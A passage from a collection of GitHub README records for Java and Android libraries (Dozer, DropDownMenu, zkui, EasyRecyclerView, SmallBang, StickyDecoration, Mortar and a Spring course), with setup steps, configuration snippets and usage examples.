configurable. Dozer supports simple property mapping, complex type mapping, bi-directional mapping, implicit-explicit mapping, as well as recursive mapping. This includes mapping collection attributes that also need mapping at the element level. Dozer not only supports mapping between attribute names, but also automatically converting between types. Most conversion scenarios are supported out of the box, but Dozer also allows you to specify custom conversions via XML or code-based configuration. ## Getting Started Check out the [Getting Started Guide](https://dozermapper.github.io/gitbook/documentation/gettingstarted.html), [Full User Guide](https://dozermapper.github.io/user-guide.pdf) or [GitBook](https://dozermapper.github.io/gitbook/) for advanced information. ## Getting the Distribution If you are using Maven, simply copy-paste this dependency to your project. ```XML <dependency> <groupId>com.github.dozermapper</groupId> <artifactId>dozer-core</artifactId> <version>7.0.0</version> </dependency> ``` ## Simple Example ```XML <mapping> <class-a>yourpackage.SourceClassName</class-a> <class-b>yourpackage.DestinationClassName</class-b> <field> <a>yourSourceFieldName</a> <b>yourDestinationFieldName</b> </field> </mapping> ``` ```Java SourceClassName sourceObject = new SourceClassName(); sourceObject.setYourSourceFieldName("Dozer"); Mapper mapper = DozerBeanMapperBuilder.buildDefault(); DestinationClassName destObject = mapper.map(sourceObject, DestinationClassName.class); assertTrue(destObject.getYourDestinationFieldName().equals(sourceObject.getYourSourceFieldName())); ```
0
dongjunkun/DropDownMenu
一个实用的多条件筛选菜单
dongjunkun dropdown-menus
[![](https://jitpack.io/v/dongjunkun/DropDownMenu.svg)](https://jitpack.io/#dongjunkun/DropDownMenu) ## 简介 一个实用的多条件筛选菜单,在很多App上都能看到这个效果,如美团,爱奇艺电影票等 我的博客 [自己造轮子--android常用多条件帅选菜单实现思路(类似美团,爱奇艺电影票下拉菜单)](http://www.jianshu.com/p/d9407f799d2d) ## 特色 - 支持多级菜单 - 你可以完全自定义你的菜单样式,我这里只是封装了一些实用的方法,Tab的切换效果,菜单显示隐藏效果等 - 并非用popupWindow实现,无卡顿 ## ScreenShot <img src="https://raw.githubusercontent.com/dongjunkun/DropDownMenu/master/art/simple.gif"/> <a href="https://raw.githubusercontent.com/dongjunkun/DropDownMenu/master/app/build/outputs/apk/app-debug.apk">Download APK</a> 或者扫描二维码 <img src="https://raw.githubusercontent.com/dongjunkun/DropDownMenu/master/art/download.png"/> ## Gradle Dependency ``` allprojects { repositories { ... maven { url "https://jitpack.io" } } } dependencies { compile 'com.github.dongjunkun:DropDownMenu:1.0.4' } ``` ## 使用 添加DropDownMenu 到你的布局文件,如下 ``` <com.yyydjk.library.DropDownMenu android:id="@+id/dropDownMenu" android:layout_width="match_parent" android:layout_height="match_parent" app:ddmenuTextSize="13sp" //tab字体大小 app:ddtextUnselectedColor="@color/drop_down_unselected" //tab未选中颜色 app:ddtextSelectedColor="@color/drop_down_selected" //tab选中颜色 app:dddividerColor="@color/gray" //分割线颜色 app:ddunderlineColor="@color/gray" //下划线颜色 app:ddmenuSelectedIcon="@mipmap/drop_down_selected_icon" //tab选中状态图标 app:ddmenuUnselectedIcon="@mipmap/drop_down_unselected_icon"//tab未选中状态图标 app:ddmaskColor="@color/mask_color" //遮罩颜色,一般是半透明 app:ddmenuBackgroundColor="@color/white" //tab 背景颜色 app:ddmenuMenuHeightPercent="0.5" 菜单的最大高度,根据屏幕高度的百分比设置 ... /> ``` 我们只需要在java代码中调用下面的代码 ``` //tabs 所有标题,popupViews 所有菜单,contentView 内容 mDropDownMenu.setDropDownMenu(tabs, popupViews, contentView); ``` 如果你要了解更多,可以直接看源码 <a href="https://github.com/dongjunkun/DropDownMenu/blob/master/app/src/main/java/com/yyy/djk/dropdownmenu/MainActivity.java">Example</a> > 建议拷贝代码到项目中使用,拷贝DropDownMenu.java 以及res下的所有文件即可 ## 关于我 简书[dongjunkun](http://www.jianshu.com/users/f07458c1a8f3/latest_articles)
0
in28minutes/spring-master-class
An updated introduction to the Spring Framework 5. Become an Expert understanding the core features of Spring In Depth. You would write Unit Tests, AOP, JDBC and JPA code during the course. Includes introductions to Spring Boot, JPA, Eclipse, Maven, JUnit and Mockito.
null
# Spring Master Class - Journey from Beginner to Expert [![Image](https://www.springboottutorial.com/images/Course-Spring-Framework-Master-Class---Beginner-to-Expert.png "Spring Master Class - Beginner to Expert")](https://www.udemy.com/course/spring-tutorial-for-beginners/) Learn the magic of Spring Framework. From IOC (Inversion of Control), DI (Dependency Injection), Application Context to the world of Spring Boot, AOP, JDBC and JPA. Get set for an incredible journey. ### Introduction Spring Framework remains as popular today as it was when I first used it 12 years back. How is this possible in the incredibly dynamic world where architectures have completely changed? ### What You will learn - You will learn the basics of Spring Framework - Dependency Injection, IOC Container, Application Context and Bean Factory. - You will understand how to use Spring Annotations - @Autowired, @Component, @Service, @Repository, @Configuration, @Primary.... - You will understand Spring MVC in depth - DispatcherServlet , Model, Controllers and ViewResolver - You will use a variety of Spring Boot Starters - Spring Boot Starter Web, Starter Data Jpa, Starter Test - You will learn the basics of Spring Boot, Spring AOP, Spring JDBC and JPA - You will learn the basics of Eclipse, Maven, JUnit and Mockito - You will develop a basic Web application step by step using JSP Servlets and Spring MVC - You will learn to write unit tests with XML, Java Application Contexts and Mockito ### Requirements - You should have working knowledge of Java and Annotations. - We will help you install Eclipse and get up and running with Maven and Tomcat. ### Step Wise Details Refer each section ## Installing Tools - Installation Video : https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3 - GIT Repository For Installation : https://github.com/in28minutes/getting-started-in-5-steps - PDF : https://github.com/in28minutes/SpringIn28Minutes/blob/master/InstallationGuide-JavaEclipseAndMaven_v2.pdf ## Running Examples - Download the zip or clone the Git repository. - Unzip the zip file (if you downloaded one) - Open Command Prompt and Change directory (cd) to folder containing pom.xml - Open Eclipse - File -> Import -> Existing Maven Project -> Navigate to the folder where you unzipped the zip - Select the right project - Choose the Spring Boot Application file (search for @SpringBootApplication) - Right Click on the file and Run as Java Application - You are all Set - For help : use our installation guide - https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3 ### Troubleshooting - Refer our TroubleShooting Guide - https://github.com/in28minutes/in28minutes-initiatives/tree/master/The-in28Minutes-TroubleshootingGuide-And-FAQ ## Youtube Playlists - 500+ Videos [Click here - 30+ Playlists with 500+ Videos on Spring, Spring Boot, REST, Microservices and the Cloud](https://www.youtube.com/user/rithustutorials/playlists?view=1&sort=lad&flow=list) ## Keep Learning in28Minutes in28Minutes is creating amazing solutions for you to learn Spring Boot, Full Stack and the Cloud - Docker, Kubernetes, AWS, React, Angular etc. - [Check out all our courses here](https://github.com/in28minutes/learn) ![in28MinutesLearningRoadmap-July2019.png](https://github.com/in28minutes/in28Minutes-Course-Roadmap/raw/master/in28MinutesLearningRoadmap-July2019.png)
0
DeemOpen/zkui
A UI dashboard that allows CRUD operations on Zookeeper.
null
zkui - Zookeeper UI Dashboard ==================== A UI dashboard that allows CRUD operations on Zookeeper. Requirements ==================== Requires Java 7 to run. Setup ==================== 1. mvn clean install 2. Copy the config.cfg to the folder with the jar file. Modify it to point to the zookeeper instance. Multiple zk instances are coma separated. eg: server1:2181,server2:2181. First server should always be the leader. 3. Run the jar. ( nohup java -jar zkui-2.0-SNAPSHOT-jar-with-dependencies.jar & ) 4. <a href="http://localhost:9090">http://localhost:9090</a> Login Info ==================== username: admin, pwd: manager (Admin privileges, CRUD operations supported) username: appconfig, pwd: appconfig (Readonly privileges, Read operations supported) You can change this in the config.cfg Technology Stack ==================== 1. Embedded Jetty Server. 2. Freemarker template. 3. H2 DB. 4. Active JDBC. 5. JSON. 6. SLF4J. 7. Zookeeper. 8. Apache Commons File upload. 9. Bootstrap. 10. Jquery. 11. Flyway DB migration. Features ==================== 1. CRUD operation on zookeeper properties. 2. Export properties. 3. Import properties via call back url. 4. Import properties via file upload. 5. History of changes + Path specific history of changes. 6. Search feature. 7. Rest API for accessing Zookeeper properties. 8. Basic Role based authentication. 9. LDAP authentication supported. 10. Root node /zookeeper hidden for safety. 11. ACL supported global level. Import File Format ==================== # add property /appconfig/path=property=value # remove a property -/path/property You can either upload a file or specify a http url of the version control system that way all your zookeeper changes will be in version control. Export File Format ==================== /appconfig/path=property=value You can export a file and then use the same format to import. SOPA/PIPA BLACKLISTED VALUE ==================== All password will be displayed as SOPA/PIPA BLACKLISTED VALUE for a normal user. Admins will be able to view and edit the actual value upon login. Password will be not shown on search / export / view for normal user. For a property to be eligible for black listing it should have (PWD / pwd / PASSWORD / password) in the property name. LDAP ==================== If you want to use LDAP authentication provide the ldap url. This will take precedence over roleSet property file authentication. ldapUrl=ldap://<ldap_host>:<ldap_port>/dc=mycom,dc=com If you dont provide this then default roleSet file authentication will be used. REST call ==================== A lot of times you require your shell scripts to be able to read properties from zookeeper. This can now be achieved with a http call. Password are not exposed via rest api for security reasons. The rest call is a read only operation requiring no authentication. Eg: http://localhost:9090/acd/appconfig?propNames=foo&host=myhost.com This will first lookup the host name under /appconfig/hosts and then find out which path the host point to. Then it will look for the property under that path. There are 2 additional properties that can be added to give better control. cluster=cluster1 http://localhost:9090/acd/appconfig?propNames=foo&cluster=cluster1&host=myhost.com In this case the lookup will happen on lookup path + cluster1. app=myapp http://localhost:9090/acd/appconfig?propNames=foo&app=myapp&host=myhost.com In this case the lookup will happen on lookup path + myapp. A shell script will call this via MY_PROPERTY="$(curl -f -s -S -k "http://localhost:9090/acd/appconfig?propNames=foo&host=`hostname -f`" | cut -d '=' -f 2)" echo $MY_PROPERTY Standardization ==================== Zookeeper doesnt enforce any order in which properties are stored and retrieved. ZKUI however organizes properties in the following manner for easy lookup. Each server/box has its hostname listed under /appconfig/hosts and that points to the path where properties reside for that path. So when the lookup for a property occurs over a rest call it first finds the hostname entry under /appconfig/hosts and then looks for that property in the location mentioned. eg: /appconfig/hosts/myserver.com=/appconfig/dev/app1 This means that when myserver.com tries to lookup the propery it looks under /appconfig/dev/app1 You can also append app name to make lookup easy. eg: /appconfig/hosts/myserver.com:testapp=/appconfig/dev/test/app1 eg: /appconfig/hosts/myserver.com:prodapp=/appconfig/dev/prod/app1 Lookup can be done by grouping of app and cluster. A cluster can have many apps under it. When the bootloader entry looks like this /appconfig/hosts/myserver.com=/appconfig/dev the rest lookup happens on the following paths. /appconfig/dev/.. /appconfig/dev/hostname.. /appconfig/dev/app.. /appconfig/dev/cluster.. /appconfig/dev/cluster/app.. This standardization is only needed if you choose to use the rest lookup. You can use zkui to update properties in general without worry about this organizing structure. HTTPS ==================== You can enable https if needed. keytool -keystore keystore -alias jetty -genkey -keyalg RSA Limitations ==================== 1. ACLs are fully supported but at a global level. Screenshots ==================== Basic Role Based Authentication <br/> <img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-0.png"/> <br/> Dashboard Console <br/> <img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-1.png"/> <br/> CRUD Operations <br/> <img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-2.png"/> <br/> Import Feature <br/> <img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-3.png"/> <br/> Track History of changes <br/> <img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-4.png"/> <br/> Status of Zookeeper Servers <br/> <img src="https://raw.github.com/DeemOpen/zkui/master/images/zkui-5.png"/> <br/> License & Contribution ==================== ZKUI is released under the Apache 2.0 license. Comments, bugs, pull requests, and other contributions are all welcomed! Thanks to Jozef Krajčovič for creating the logo which has been used in the project. https://www.iconfinder.com/iconsets/origami-birds
0
Jude95/EasyRecyclerView
ArrayAdapter,pull to refresh,auto load more,Header/Footer,EmptyView,ProgressView,ErrorView
null
# EasyRecyclerView [中文](https://github.com/Jude95/EasyRecyclerView/blob/master/README_ch.md) | [English](https://github.com/Jude95/EasyRecyclerView/blob/master/README.md) Encapsulate many API about RecyclerView into the library,such as arrayAdapter,pull to refresh,auto load more,no more and error in the end,header&footer. The library uses a new usage of ViewHolder,decoupling the ViewHolder and Adapter. Adapter will do less work,adapter only direct the ViewHolder,if you use MVP,you can put adapter into presenter.ViewHolder only show the item,then you can use one ViewHolder for many Adapter. Part of the code modified from [Malinskiy/SuperRecyclerView](https://github.com/Malinskiy/SuperRecyclerView),make more functions handed by Adapter. # Dependency ```groovy compile 'com.jude:easyrecyclerview:4.4.2' ``` # ScreenShot ![recycler.gif](recycler3.gif) # Usage ## EasyRecyclerView ```xml <com.jude.easyrecyclerview.EasyRecyclerView android:id="@+id/recyclerView" android:layout_width="match_parent" android:layout_height="match_parent" app:layout_empty="@layout/view_empty" app:layout_progress="@layout/view_progress" app:layout_error="@layout/view_error" app:recyclerClipToPadding="true" app:recyclerPadding="8dp" app:recyclerPaddingTop="8dp" app:recyclerPaddingBottom="8dp" app:recyclerPaddingLeft="8dp" app:recyclerPaddingRight="8dp" app:scrollbarStyle="insideOverlay"//insideOverlay or insideInset or outsideOverlay or outsideInset app:scrollbars="none"//none or vertical or horizontal /> ``` **Attention** EasyRecyclerView is not a RecyclerView just contain a RecyclerView.use 'getRecyclerView()' to get the RecyclerView; **EmptyView&LoadingView&ErrorView** xml: ```xml app:layout_empty="@layout/view_empty" app:layout_progress="@layout/view_progress" app:layout_error="@layout/view_error" ``` code: ```java void setEmptyView(View emptyView) void setProgressView(View progressView) void setErrorView(View errorView) ``` then you can show it by this whenever: ```java void showEmpty() void showProgress() void showError() void showRecycler() ``` **scrollToPosition** ```java void scrollToPosition(int position); // such as scroll to top ``` **control the pullToRefresh** ```java void setRefreshing(boolean isRefreshing); void setRefreshing(final boolean isRefreshing, final boolean isCallback); //second params is callback immediately ``` ##RecyclerArrayAdapter<T> there is no relation between RecyclerArrayAdapter and EasyRecyclerView.you can user any Adapter for the EasyRecyclerView,and use the RecyclerArrayAdapter for any RecyclerView. **Data Manage** ```java void add(T object); void addAll(Collection<? extends T> collection); void addAll(T ... items); void insert(T object, int index); void update(T object, int index); void remove(T object); void clear(); void sort(Comparator<? super T> comparator); ``` **Header&Footer** ```java void addHeader(ItemView view) void addFooter(ItemView view) ``` ItemView is not a view but a view creator; ```java public interface ItemView { View onCreateView(ViewGroup parent); void onBindView(View itemView); } ``` The onCreateView and onBindView correspond the callback in RecyclerView's Adapter,so adapter will call `onCreateView` once and `onBindView` more than once; It recommend that add the ItemView to Adapter after the data is loaded,initialization View in onCreateView and nothing in onBindView. Header and Footer support `LinearLayoutManager`,`GridLayoutManager`,`StaggeredGridLayoutManager`. In `GridLayoutManager` you must add this: ```java //make adapter obtain a LookUp for LayoutManager,param is maxSpan。 gridLayoutManager.setSpanSizeLookup(adapter.obtainGridSpanSizeLookUp(2)); ``` **OnItemClickListener&OnItemLongClickListener** ```java adapter.setOnItemClickListener(new RecyclerArrayAdapter.OnItemClickListener() { @Override public void onItemClick(int position) { //position not contain Header } }); adapter.setOnItemLongClickListener(new RecyclerArrayAdapter.OnItemLongClickListener() { @Override public boolean onItemLongClick(int position) { return true; } }); ``` equal 'itemview.setOnClickListener()' in ViewHolder. if you set listener after RecyclerView has layout.you should use 'notifyDataSetChange()'; ###the API below realized by add a Footer。 **LoadMore** ```java void setMore(final int res,OnMoreListener listener); void setMore(final View view,OnMoreListener listener); ``` Attention when you add null or the length of data you add is 0 ,it will finish LoadMore and show NoMore; also you can show NoMore manually `adapter.stopMore();` **LoadError** ```java void setError(final int res,OnErrorListener listener) void setError(final View view,OnErrorListener listener) ``` use `adapter.pauseMore()` to show Error,when your loading throw an error; if you add data when showing Error.it will resume to load more; when the ErrorView display to screen again,it will resume to load more too,and callback the OnLoadMoreListener(retry). `adapter.resumeMore()`you can resume to load more manually,it will callback the OnLoadMoreListener immediately. you can put resumeMore() into the OnClickListener of ErrorView to realize click to retry. **NoMore** ```java void setNoMore(final int res,OnNoMoreListener listener) void setNoMore(final View view,OnNoMoreListener listener) ``` when loading is finished(add null or empty or stop manually),it while show in the end. ## BaseViewHolder\<M\> decoupling the ViewHolder and Adapter,new ViewHolder in Adapter and inflate view in ViewHolder. Example: ```java public class PersonViewHolder extends BaseViewHolder<Person> { private TextView mTv_name; private SimpleDraweeView mImg_face; private TextView mTv_sign; public PersonViewHolder(ViewGroup parent) { super(parent,R.layout.item_person); mTv_name = $(R.id.person_name); mTv_sign = $(R.id.person_sign); mImg_face = $(R.id.person_face); } @Override public void setData(final Person person){ mTv_name.setText(person.getName()); mTv_sign.setText(person.getSign()); mImg_face.setImageURI(Uri.parse(person.getFace())); } } ----------------------------------------------------------------------- public class PersonAdapter extends RecyclerArrayAdapter<Person> { public PersonAdapter(Context context) { super(context); } @Override public BaseViewHolder OnCreateViewHolder(ViewGroup parent, int viewType) { return new PersonViewHolder(parent); } } ``` ## Decoration Now there are three commonly used decoration provide for you. **DividerDecoration** Usually used in LinearLayoutManager.add divider between items. ```java DividerDecoration itemDecoration = new DividerDecoration(Color.GRAY, Util.dip2px(this,0.5f), Util.dip2px(this,72),0);//color & height & paddingLeft & paddingRight itemDecoration.setDrawLastItem(true);//sometimes you don't want draw the divider for the last item,default is true. itemDecoration.setDrawHeaderFooter(false);//whether draw divider for header and footer,default is false. recyclerView.addItemDecoration(itemDecoration); ``` this is the demo: <image src="http://o84n5syhk.bkt.clouddn.com/divider.jpg?imageView2/2/w/300" width=300/> **SpaceDecoration** Usually used in GridLayoutManager and StaggeredGridLayoutManager.add space between items. ```java SpaceDecoration itemDecoration = new SpaceDecoration((int) Utils.convertDpToPixel(8,this));//params is height itemDecoration.setPaddingEdgeSide(true);//whether add space for left and right adge.default is true. itemDecoration.setPaddingStart(true);//whether add top space for the first line item(exclude header).default is true. itemDecoration.setPaddingHeaderFooter(false);//whether add space for header and footer.default is false. recyclerView.addItemDecoration(itemDecoration); ``` this is the demo: <image src="http://o84n5syhk.bkt.clouddn.com/space.jpg?imageView2/2/w/300" width=300/> **StickHeaderDecoration** Group the items,add a GroupHeaderView for each group.The usage of StickyHeaderAdapter is the same with RecyclerView.Adapter. this part is modified from [edubarr/header-decor](https://github.com/edubarr/header-decor) ```java StickyHeaderDecoration decoration = new StickyHeaderDecoration(new StickyHeaderAdapter(this)); decoration.setIncludeHeader(false); recyclerView.addItemDecoration(decoration); ``` for example: <image src="http://7xkr5d.com1.z0.glb.clouddn.com/recyclerview_sticky.png?imageView2/2/w/300" width=300/> **for detail,see the demo** License ------- Copyright 2015 Jude Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
hanks-zyh/SmallBang
twitter like animation for any view :heartbeat:
animation heartbeat like-button twitter
# SmallBang twitter like animation for any view :heartbeat: <img src="https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/demo2.gif" width="35%" /> [Demo APK](https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/demo.apk?raw=true) ## Usage ```groovy dependencies { implementation 'pub.hanks:smallbang:1.2.2' } ``` ```xml <xyz.hanks.library.bang.SmallBangView android:id="@+id/like_heart" android:layout_width="56dp" android:layout_height="56dp"> <ImageView android:id="@+id/image" android:layout_width="20dp" android:layout_height="20dp" android:layout_gravity="center" android:src="@drawable/heart_selector" android:text="Hello World!"/> </xyz.hanks.library.bang.SmallBangView> ``` or ```xml <xyz.hanks.library.bang.SmallBangView android:id="@+id/like_text" android:layout_width="wrap_content" android:layout_height="wrap_content" app:circle_end_color="#ffbc00" app:circle_start_color="#fa9651" app:dots_primary_color="#fa9651" app:dots_secondary_color="#ffbc00"> <TextView android:id="@+id/text" android:layout_width="50dp" android:layout_height="20dp" android:layout_gravity="center" android:gravity="center" android:text="hanks" android:textColor="@color/text_selector" android:textSize="14sp"/> </xyz.hanks.library.bang.SmallBangView> ``` ## Donate If this project help you reduce time to develop, you can give me a cup of coffee :) [![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UGENU2RU26RUG) <img src="https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/donate.png" width="50%" /> ## Contact & Help Please fell free to contact me if there is any problem when using the library. - **email**: zhangyuhan2014@gmail.com - **twitter**: https://twitter.com/zhangyuhan3030 - **weibo**: http://weibo.com/hanksZyh - **blog**: http://hanks.pub welcome to commit [issue](https://github.com/hanks-zyh/SmallBang/issues) & [pr](https://github.com/hanks-zyh/SmallBang/pulls) --- ## License This library is licensed under the [Apache Software License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0). See [`LICENSE`](LICENSE) for full of the license text. Copyright (C) 2015 [Hanks](https://github.com/hanks-zyh) Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
Gavin-ZYX/StickyDecoration
null
null
# StickyDecoration 利用`RecyclerView.ItemDecoration`实现顶部悬浮效果 ![效果](http://upload-images.jianshu.io/upload_images/1638147-89986d7141741cdf.gif?imageMogr2/auto-orient/strip) ## 支持 - **LinearLayoutManager** - **GridLayoutManager** - **点击事件** - **分割线** ## 添加依赖 项目要求: `minSdkVersion` >= 14. 在你的`build.gradle`中 : ```gradle repositories { maven { url 'https://jitpack.io' } } dependencies { compile 'com.github.Gavin-ZYX:StickyDecoration:1.6.1' } ``` **最新版本** [![](https://jitpack.io/v/Gavin-ZYX/StickyDecoration.svg)](https://jitpack.io/#Gavin-ZYX/StickyDecoration) ## 使用 #### 文字悬浮——StickyDecoration > **注意** 使用recyclerView.addItemDecoration()之前,必须先调用recyclerView.setLayoutManager(); 代码: ```java GroupListener groupListener = new GroupListener() { @Override public String getGroupName(int position) { //获取分组名        return mList.get(position).getProvince(); } }; StickyDecoration decoration = StickyDecoration.Builder .init(groupListener) //重置span(使用GridLayoutManager时必须调用) //.resetSpan(mRecyclerView, (GridLayoutManager) manager) .build(); ... mRecyclerView.setLayoutManager(manager); //需要在setLayoutManager()之后调用addItemDecoration() mRecyclerView.addItemDecoration(decoration); ``` 效果: ![LinearLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-f3c2cbe712aa65fb.gif?imageMogr2/auto-orient/strip) ![GridLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-e5e0374c896110d0.gif?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) **支持的方法:** | 方法 | 功能 | 默认 | |-|-|-| | setGroupBackground | 背景色 | #48BDFF | | setGroupHeight | 高度 | 120px | | setGroupTextColor | 字体颜色 | Color.WHITE | | setGroupTextSize | 字体大小 | 50px | | setDivideColor | 分割线颜色 | #CCCCCC | | setDivideHeight | 分割线高宽度 | 0 | | setTextSideMargin | 边距(靠左时为左边距 靠右时为右边距) | 10 | | setHeaderCount | 头部Item数量(仅LinearLayoutManager) | 0 | | setSticky | 是否需要吸顶效果 | true | |方法|功能|描述| |-|-|-| | setOnClickListener | 点击事件 | 设置点击事件,返回当前分组下第一个item的position | | resetSpan | 重置 | 使用GridLayoutManager时必须调用 | ### 自定义View悬浮——PowerfulStickyDecoration 先创建布局`item_group` ```xml <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/ll" android:orientation="horizontal" ...> <ImageView android:id="@+id/iv" .../> <TextView android:id="@+id/tv" .../> </LinearLayout> ``` 创建`PowerfulStickyDecoration`,实现自定`View`悬浮 ```java PowerGroupListener listener = new PowerGroupListener() { @Override public String getGroupName(int position) { return mList.get(position).getProvince(); } @Override public View getGroupView(int position) { //获取自定定义的组View View view = getLayoutInflater().inflate(R.layout.item_group, null, false); ((TextView) view.findViewById(R.id.tv)).setText(mList.get(position).getProvince()); return view; } }; PowerfulStickyDecoration decoration = PowerfulStickyDecoration.Builder .init(listener) //重置span(注意:使用GridLayoutManager时必须调用) //.resetSpan(mRecyclerView, (GridLayoutManager) manager) .build(); ... mRecyclerView.addItemDecoration(decoration); ``` 效果: ![效果](http://upload-images.jianshu.io/upload_images/1638147-3fed255296a6c3db.gif?imageMogr2/auto-orient/strip) **支持的方法:** | 方法 | 功能 | 默认 | | -- | -- | -- | | setGroupHeight | 高度 | 120px | | setGroupBackground | 背景色 | #48BDFF | | setDivideColor | 分割线颜色 | #CCCCCC | | setDivideHeight | 分割线高宽度 | 0 | | setCacheEnable | 是否使用缓存| 使用缓存 | | setHeaderCount | 头部Item数量(仅LinearLayoutManager) | 0 | | setSticky | 是否需要吸顶效果 | true | |方法|功能|描述| |-|-|-| | setOnClickListener | 点击事件 | 设置点击事件,返回当前分组下第一个item的position以及对应的viewId | | resetSpan | 重置span |使用GridLayoutManager时必须调用 | | notifyRedraw | 通知重新绘制 | 使用场景:网络图片加载后调用方法使用) | | clearCache | 清空缓存 | 在使用缓存的情况下,数据改变时需要清理缓存 | **Tips** 1、若使用网络图片时,在图片加载完成后需要调用 ```java decoration.notifyRedraw(mRv, view, position); ``` 2、使用缓存时,若数据源改变,需要调用clearCache清除数据 3、点击事件穿透问题,参考demo中MyRecyclerView。[issue47](https://github.com/Gavin-ZYX/StickyDecoration/issues/37) # 更新日志 ----------------------------- 1.6.0 (2022-8-21)---------------------------- - fix:取消缓存无效问题 - 迁移仓库 - 迁移到Androidx ----------------------------- 1.5.3 (2020-12-15)---------------------------- - 支持是否需要吸顶效果 ----------------------------- 1.5.2 (2019-9-3)---------------------------- - fix:特殊情况下,吸顶效果不佳问题 ----------------------------- 1.5.1 (2019-8-8)---------------------------- - fix:setHeaderCount导致显示错乱问题 ----------------------------- 1.5.0 (2019-6-17)---------------------------- - fix:GridLayoutManager刷新后数据混乱问题 ----------------------------- 1.4.12 (2019-5-8)---------------------------- - fix:setDivideColor不生效问题 ----------------------------- 1.4.9 (2018-10-9)---------------------------- - fix:由于添加header导致的一些问题 ----------------------------- 1.4.8 (2018-08-26)---------------------------- - 顶部悬浮栏点击事件穿透问题:提供处理方案 ----------------------------- 1.4.7 (2018-08-16)---------------------------- - fix:数据变化后,布局未刷新问题 ----------------------------- 1.4.6 (2018-07-29)---------------------------- - 修改缓存方式 - 加入性能检测 ----------------------------- 1.4.5 (2018-06-17)---------------------------- - 在GridLayoutManager中使用setHeaderCount方法导致布局错乱问题 ----------------------------- 1.4.4 (2018-06-2)---------------------------- - 添加setHeaderCount方法 - 修改README - 修复bug ----------------------------- 1.4.3 (2018-05-27)---------------------------- - 修复一些bug,更改命名 ----------------------------- 1.4.2 (2018-04-2)---------------------------- - 增强点击事件,现在可以得到悬浮条内View点击事件(没有设置id时,返回View.NO_ID) - 修复加载更多返回null崩溃或出现多余的悬浮Item问题(把加载更多放在Item中的加载方式) ----------------------------- 1.4.1 (2018-03-21)---------------------------- - 默认取消缓存,避免数据改变时显示出问题 - 添加clearCache方法用于清理缓存 ----------------------------- 1.4.0 (2018-03-04)---------------------------- - 支持异步加载后的重新绘制(如网络图片加载) - 优化缓存 - 优化GridLayoutManager的分割线 ----------------------------- 1.3.1 (2018-01-30)---------------------------- - 修改测量方式 ----------------------------- 1.3.0 (2018-01-28)---------------------------- - 删除isAlignLeft()方法,需要靠右时,直接在布局中处理就可以了。 - 优化缓存机制。
0
square/mortar
A simple library that makes it easy to pair thin views with dedicated controllers, isolated from most of the vagaries of the Activity life cycle.
null
# Mortar ## Deprecated Mortar had a good run and served us well, but new use is strongly discouraged. The app suite at Square that drove its creation is in the process of replacing Mortar with [Square Workflow](https://square.github.io/workflow/). ## What's a Mortar? Mortar provides a simplified, composable overlay for the Android lifecycle, to aid in the use of [Views as the modular unit of Android applications][rant]. It leverages [Context#getSystemService][services] to act as an a la carte supplier of services like dependency injection, bundle persistence, and whatever else your app needs to provide itself. One of the most useful services Mortar can provide is its [BundleService][bundle-service], which gives any View (or any object with access to the Activity context) safe access to the Activity lifecycle's persistence bundle. For fans of the [Model View Presenter][mvp] pattern, we provide a persisted [Presenter][presenter] class that builds on BundleService. Presenters are completely isolated from View concerns. They're particularly good at surviving configuration changes, weathering the storm as Android destroys your portrait Activity and Views and replaces them with landscape doppelgangers. Mortar can similarly make [Dagger][dagger] ObjectGraphs (or [Dagger2][dagger2] Components) visible as system services. Or not &mdash; these services are completely decoupled. Everything is managed by [MortarScope][scope] singletons, typically backing the top level Application and Activity contexts. You can also spawn your own shorter lived scopes to manage transient sessions, like the state of an object being built by a set of wizard screens. <!-- This example is a little bit confusing. Maybe explain why you would want to have an extended graph for a wizard, then explain how Mortar shadows the parent graph with that extended graph. --> These nested scopes can shadow the services provided by higher level scopes. For example, a [Dagger extension graph][ogplus] specific to your wizard session can cover the one normally available, transparently to the wizard Views. Calls like `ObjectGraphService.inject(getContext(), this)` are now possible without considering which graph will do the injection. ## The Big Picture An application will typically have a singleton MortarScope instance. Its job is to serve as a delegate to the app's `getSystemService` method, something like: ```java public class MyApplication extends Application { private MortarScope rootScope; @Override public Object getSystemService(String name) { if (rootScope == null) rootScope = MortarScope.buildRootScope().build(getScopeName()); return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name); } } ``` This exposes a single, core service, the scope itself. From the scope you can spawn child scopes, and you can register objects that implement the [Scoped](https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Scoped.java#L18) interface with it for setup and tear-down calls. * `Scoped#onEnterScope(MortarScope)` * `Scoped#onExitScope(MortarScope)` To make a scope provide other services, like a [Dagger ObjectGraph][og], you register them while building the scope. That would make our Application's `getSystemService` method look like this: ```java @Override public Object getSystemService(String name) { if (rootScope == null) { rootScope = MortarScope.buildRootScope() .with(ObjectGraphService.SERVICE_NAME, ObjectGraph.create(new RootModule())) 